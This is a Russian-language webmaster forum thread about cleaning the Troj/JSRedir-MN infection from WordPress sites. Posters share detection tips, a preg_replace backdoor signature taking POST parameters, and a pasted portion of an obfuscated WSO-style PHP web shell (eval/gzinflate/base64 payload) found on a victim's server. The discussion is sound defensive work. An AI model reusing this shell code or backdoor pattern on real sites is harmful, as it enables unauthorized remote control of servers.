Яндекс нашёл вирус Troj/JSRedir-MN

Уже столько времени прошло, ТС ты забивал хотябы имя трояна в гугл?

Зы почитал топик - ТС тормоз и школьник 😂

У кого проблема с данным вирусом на Wordpress , то вот подробное описание, где и как смотреть и что удалять:

http://kakge.ru/kak-udalit-virus-trojjsredir-mn-po-dannym-kompanii-sophos/

А с чего вы взяли, что яндекс вам должен указывать генерируется у вас вирус или нет? вирус показываться может очень изощренными способами и формироваться так же.

Итак, по совету AGmb была произведена проверка всех сайтов на наличие файлов *.php c размером 23646 байт, после чего обнаружились два файла с разными названиями, но с одинаковой начинкой. Часть содержимого файлов выкладываю, может кому пригодится:

(Весь код не даёт выложить ограничение по количеству символов на пост)

<?php
$auth_pass='a1846ea17f2ba42a5eab9ff88091cc3e';preg_replace("/.*/".'e',chr(101).chr(118).chr(97).chr(108).chr(40).chr(103).chr(122).chr(105).chr(110).chr(102).chr(108).chr(97).chr(116).chr(101).chr(40).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(39)."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

evanda2115, если я не ошибаюсь это на шелл код похоже, wso, в переменной auth_pass хеш пароля от админки. Как называется php file ?

Я вчера тоже подчистил файлы *.php c размером 23646 байт, но это не помогло - вредоносные коды все-равно появляются, видимо дело не в этих файлах. Сейчас один из зараженных сайтов перенес с таймвеба на другой хостинг - проверю, может это дыра у хостера...

Ну размер файлов не всегда даст нужный 100% результат поиска шелл.

Взломщик указывает даты создания файла с левым кодом, те же ,что и дата создания файлов находящихся в папке.

Вчера нашел простыню кода с $auth_pass,а в ноябре код шелла был всего одна строка.

так ведь код с $auth_pass тоже весь вычистил, а так же swf вредоносные поудалял, проверил через ai-bolit - тоже несколько файлов подправил, обновился, сменил все пароли, НО всё равно сегодня код вылез... надеюсь смена хостера поможет...

поищите в файлах php следующий код

preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3'])

если нашли - скорее всего этот файл - часть вируса

а также все файлы с расширением php в папке upload

Имена файлов писать бессмысленно, так как они маскируются под находящиеся рядом файлы. Принимают такое же имя, только с раcширением php.

У меня они назывались

ab4240aeee.php

timthumb_int_d45fa3c7f26524cf69b7d8b02225cf5c.timthumb.php

Врядле от этого будет какая-то польза